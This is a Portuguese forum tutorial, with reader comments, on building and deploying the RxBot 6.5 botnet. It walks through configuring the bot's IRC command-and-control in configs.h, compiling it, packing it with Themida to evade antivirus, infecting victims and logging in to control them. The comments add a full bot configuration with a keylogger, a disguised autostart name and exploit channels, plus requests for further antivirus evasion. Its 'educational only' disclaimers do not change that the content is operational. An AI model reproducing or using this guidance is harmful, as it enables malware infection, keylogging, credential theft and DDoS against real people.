Tutorial Botnet – RxBot 6.5
Andei lendo aqui no forum muitas dúvidas sobre como fazer, ou como utilizar um botnet. Então pesquisei para ver se haviam mais matérias sobre o gênero, aqui, e encontrei apenas uma, a do moderador fvox!
Fiz este tutorial com o intuito de passar conhecimento para a comunidade invaders, e não para fins maliciosos! Os créditos do tutorial também vão para meu amigo Skyze, que me emprestou seu canal IRC e me deu diversos toques sobre o assunto!
Agora irei fazer uma breve introdução sobre o que são botnets!
Para quem não sabe, botnets são uma rede de máquinas infectadas por um botnet, assim podendo chamá-las de “máquinas zumbis”, ou simplemente “bots”!
A pessoa que controla as máquinas infectadas, chamado de Bot Herder, conecta-se a elas através de canais da rede IRC, na maioria das vezes. Os ataques mais comuns envolvendo botnets, são os de DDoS (Negação de serviço) e spamming.
A imagem abaixo mostra esquematicamente como funcionam as botnets:
- Downloads
Cliente mIRC – Download
O Cliente mIRC será utilizado para nos conectarmos com os bots.
RxBot 6.5 – Download
O RxBot é um botnet ótimo, em C++. Ele possui as mais variadas funções, como scanning, cmd remoto, DDoS e muitas outras!
Visual C++ 6.0 – Download
Visual C++ 6 é um compilador de C++ que é recomendado para compilar o RxBot. Eu não testei em versões superiores. Se vocês quiserem, fiquem à vontade e postem o resultado!
Microsoft Platform SDK- Download
É grandinho, mas é necessário instalar hehe
SENHA DOS ARQUIVOS: 123456
- Configurando Visual C++ 6.0
Após baixar os arquivos, extraia tudo para algum diretório de fácil acesso. Recomendo no C:\ .
Depois instale o Visual C++ 6 e o Microsoft Platform SDK. Este último pode demorar bastante, e ocupará cerca de 900 mb em seu disco rígido.
Agora precisaremos fazer algumas alterações no compilador.
Iniciem o Visual C++ 6. Na barra de menus, vá em:
Tools -> Options
Abrirá uma janela com 6 abas, então clique em Directories
Irão existir três itens já, então clique no botão de adicionar, e insira mais estes:
C:\Program Files\Microsoft Platform SDK\
C:\Program Files\Microsoft Platform SDK\Bin\
C:\Program Files\Microsoft Platform SDK\Include\
C:\Program Files\Microsoft Platform SDK\Lib\
OBS.: Se você não instalar neste diretório procure-o.
Depois disto de OK.
- Configurando o RxBot
Agora que já configuramos o Visual C++ 6, podemos configurar o RxBot! Para isto, vamos em File -> Open.
Iremos até a pasta que extraimos o RxBot, e nela, procuraremos o arquivo: configs.h
Este arquivo é o responsável por obter nossas informações, que farão o bot conectar ao IRC.
Ao abri-lo, procurem estas duas linhas:
Nela, vocês devem colocar a porta do IRC. A padrão é a 6667.
Agora vocês devem ir um pouco mais para baixo da página, e procurar as seguintes linhas:
Na imagem está tudo comentado, mas explicarei melhor os campos obrigatórios:
- Código:
botid: simplismente o ID do bot
version: é a versão do bot
password: a senha que você utilizará para logar-se no bot
server: servidor do IRC
serverpass: senha do server IRC, caso possua uma
channel: canal do IRC
channelpass: senha do canal, caso possua uma
filename: arquivo do bot
keylogfile: logs do keylogger
valuename: descrição do arquivo
nickconst: é a primeira parte do nick do bot
szLocalPayloadFile: local em que o payload que será criado
modeonconn: parametros do server
exploitchan: canal do IRC
keylogchan: canal do IRC
psniffchan: canal do IRC
Depois de vocês terem configurado de acordo com seus dados, vocês podem salvar o arquivo. Após salvá-lo, vá em File -> Open Workspace
Abra o arquivo rBot.dsw
Quando você abrir, no canto esquerdo da tela procure o arquivo configs.h e veja se ele está como você salvou.
Caso esteja, você pode prosseguir para o próximo passo. Caso contrário, edite novamente.
Agora que tudo está pronto, falta apenas compilar o bot.
Compile-o, e na pasta do RxBot, será criada outra, chamada Debug. Nela conterá o executável do server.
- Infectando e Logando
Após você criar o servidor, você pode passá-lo no Themida (um antigo amigo hehe), para ele ficar indetectável pelo aVast, sem corromper.
Depois que você infectar a vítima, você deverá ir no mIRC, no canal que você configurou, para logar-se no bot.
Para logar, você deve fazer o seguinte:
.login 123456 <- No meu caso o “123456″ é a senha que eu determinei nas configurações.
Os comandos do bot estão em um arquivo .html junto à pasta do RxBot!
- Conclusão
Nesta matéria, eu passei o conceito básico de botnets, e um simples exemplo de como utilizar um. Tudo que foi feito aqui foi testado em uma máquina virtual, e eu recomendo que vocês façam o mesmo. Gostaria de agradecer mais uma vez ao meu amigo Skyze por me emprestar seu canal no IRC, que eu não estarei divulgando, uns bots hehe, e por me dar umas dicas 
Eu criei o tutorial para passar conhecimento para a comunidade Invaders, e não motivá-los a praticar tal ação! Espero que gostem!
Créditos: Rahackzin
This post was mentioned on Twitter by inwseguranca: Novo Post: ( http://www.inw-seguranca.com/wordpress/?p=1248 )…
Under executable files
C:\PROGRAM FILES\MICROSOFT SDK\BIN
Under include files
C:\PROGRAM FILES\MICROSOFT SDK\INCLUDE
Under library files
C:\PROGRAM FILES\MICROSOFT SDK\LIB
NOTE: It is very important that they are at the top of the path lists under Tools|Options|Directories otherwise it will not compile
Eu estava adicionando todas as pastas que você citou em includes, acho que a maioria que ler tambem fara o mesmo
Obrigado por postar como se soluciona este problema!
É muito bom poder contar com você.
No exemplo se.quakenet.org é um servidor irc, onde o bot se conectará.
——————————————
char botid[] = “Tr0gBot”; // bot id
char version[] = “[RxBot v7.6 modded by Tr0gd0r]“; // Bots !version reply
char password[] = “”; // bot password
char server[] = “se.quakenet.org”; // server
char serverpass[] = “123456″; // server password
char channel[] = “#dsadavis_channel”; // channel that the bot should join
char chanpass[] = “”; // channel password
char server2[] = “”; // backup server (optional)
char channel2[] = “”; // backup channel (optional)
char chanpass2[] = “”; // backup channel password (optional)
char filename[] = “winmgr.exe”; // destination file name
char keylogfile[] = “system.txt”; // keylog filename
char valuename[] = “Microsoft Update Machine”; // value name for autostart
char nickconst[] = “n-”; // first part to the bot’s nick
char szLocalPayloadFile[]=”msconfig.dat”; // Payload filename
char modeonconn[] = “-x+B”; // Can be more than one mode and contain both + and -
char exploitchan[] = “#n”; // Channel where exploit messages get redirected
char keylogchan[] = “#n”; // Channel where keylog messages get redirected
char psniffchan[] = “#n”
ex: o do Cyberscprit
cyberscript.virtualife.com.br
Faltou tbm o password para você logar no bot
Estes erros são no Visual C++ ou no programa?
E que está faltando a biblioteca windns.h no seu computador.
VocÊ deve baixa-la
C:\ARQUIVOS DE PROGRAMAS\MICROSOFT PLATFORM SDK\INCLUDE\iphlpapi.h(183) : error C2065: ‘PMIB_ICMP_EX’ : undeclared identifier
C:\ARQUIVOS DE PROGRAMAS\MICROSOFT PLATFORM SDK\INCLUDE\iphlpapi.h(183) : error C2146: syntax error : missing ‘)’ before identifier ‘pStats’
C:\ARQUIVOS DE PROGRAMAS\MICROSOFT PLATFORM SDK\INCLUDE\iphlpapi.h(183) : warning C4229: anachronism used : modifiers on data are ignored
C:\ARQUIVOS DE PROGRAMAS\MICROSOFT PLATFORM SDK\INCLUDE\iphlpapi.h(185) : error C2059: syntax error : ‘)’
C:\Documents and Settings\cesar\Meus documentos\Downloads\RxBot 6.5\RxBot 6.5\loaddlls.h(134) : error C2065: ‘LMSTR’ : undeclared identifier
C:\Documents and Settings\cesar\Meus documentos\Downloads\RxBot 6.5\RxBot 6.5\loaddlls.h(134) : error C2275: ‘DWORD’ : illegal use of this type as an expression
C:\Arquivos de programas\Microsoft Visual Studio\VC98\INCLUDE\windef.h(141) : see declaration of ‘DWORD’
C:\Documents and Settings\cesar\Meus documentos\Downloads\RxBot 6.5\RxBot 6.5\loaddlls.h(134) : error C2059: syntax error : ‘)’
C:\Documents and Settings\cesar\Meus documentos\Downloads\RxBot 6.5\RxBot 6.5\functions.h(134) : error C2146: syntax error : missing ‘;’ before identifier ‘fNetWkstaGetInfo’
C:\Documents and Settings\cesar\Meus documentos\Downloads\RxBot 6.5\RxBot 6.5\functions.h(134) : fatal error C1004: unexpected end of file found
obrigado
syntax error : missing ‘;’ before identifier ‘fNetWkstaGetInfo’
a alguem pode me dizer como deixar o virus mais camuflado?? tipo eu uso o avira aki e ele pega facinho…
obrigado
eu axei um programa aki que bloqueia qualquer conta de MSN pelo tempo q vc quiser…
c alguem tiver interesse spaykz@hotmail.com funciona mto bem
isso qndo o temida nao corrompe o arquivo.. sei la.. os outros crypters q tem por ai ou nao funcionao no caso.. ja sao detectaveis ou sao apenas trojans e nao funcinam…
mas vlw ae, vou ler os outros topics do site.. flw
thx.
Pessoal quem usa o vista não vai conseguir compilar,mas pra resolver isso é fácil,basta baixar o Microsoft virtual pc,e rodar (Instalar) o xp nele,feito isso você consegue rodar seguindo os passos ensinados lá em cima.
Eu usei o XP pirata service pack 2 e deu certo
“Cannot compile the file ‘C:\Bot\RxBot6.5\configs.h’; no compile tool is associated with the file extension”
alguem me ajuda ? :/
Cannot compile de file ‘C:\arquivos de programas\…’ no compile tool is associated with the file extension
oq sera q eh isso :/
valew !
so mais uma coisa, voce tem algum conhecimento em alguma linguagem (c,c++,html,java)
Obrigado